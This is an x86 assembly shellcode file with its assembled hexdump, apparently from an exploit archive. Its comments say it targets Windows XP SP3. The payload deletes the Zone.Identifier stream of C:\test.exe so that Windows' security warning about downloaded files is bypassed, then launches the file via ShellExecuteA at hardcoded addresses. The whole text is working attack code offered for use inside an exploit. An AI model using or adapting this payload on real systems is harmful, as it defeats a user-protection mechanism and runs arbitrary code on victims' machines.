; Author: sinn3r
; Tested on Windows XP SP3
; Description:
; This shellcode will attempt to delete the Zone.Identifier ADS (it's a
; trick Microsoft uses to warn you about an exe when you try to run it),
; and then run the file using the ShellExecuteA function.
; Make sure the exploited app has the following components loaded
; (should be pretty common):
; KERNEL32, msvcrt, SHELL32
 
[BITS 32]
 
global _start
 
_start:
 
push 0x00657865
push 0x2e747365
push 0x745c3a43
xor edi, edi
mov edi, esp        ; edi = "C:\test.exe"
 
xor esi, esi
push 0x00004154
push 0x4144243a
push 0x72656966
push 0x69746e65
push 0x64492e65
push 0x6e6f5a3a
mov esi, esp            ; edi = fork
 
push esi
push edi
xor eax, eax
mov eax, 0x77C46040 ; msvcrt.strcat  (Windows XP SP3)
call eax
 
xor eax, eax
mov eax, 0x7c831ec5 ; KERNEL32.DeleteFileA  (Windows XP SP3)
call eax
 
xor edx, edx
mov word [edi + 11], dx
 
push edx
push 0x6e65706f
mov edx, esp        ; edx = "open"
xor eax, eax
push eax        ; IsShown = NULL
push eax        ; DefDir = NULL
push eax        ; Parameters = NULL
push edi        ; Filename
push edx        ; Operation = "open"
push eax        ; hwnd = NULL
mov eax, 0x7ca41150 ; SHELL32.ShellExecuteA  (Windows XP SP3)
call eax
 
; shellcode:
; sinn3r@backtrack:~$ nasm -f bin shellexecute.asm -o shellexecute | cat shellexecute |hexdump -C |grep -v 00000066
; 00000000  68 65 78 65 00 68 65 73  74 2e 68 43 3a 5c 74 31  |hexe.hest.hC:\t1|
; 00000010  ff 89 e7 31 f6 68 54 41  00 00 68 3a 24 44 41 68  |...1.hTA..h:$DAh|
; 00000020  66 69 65 72 68 65 6e 74  69 68 65 2e 49 64 68 3a  |fierhentihe.Idh:|
; 00000030  5a 6f 6e 89 e6 56 57 31  c0 b8 40 60 c4 77 ff d0  |Zon..VW1..@`.w..|
; 00000040  31 c0 b8 c5 1e 83 7c ff  d0 31 d2 66 89 57 0b 52  |1.....|..1.f.W.R|
; 00000050  68 6f 70 65 6e 89 e2 31  c0 50 50 50 57 52 50 b8  |hopen..1.PPPWRP.|
; 00000060  50 11 a4 7c ff d0                                 |P..|..|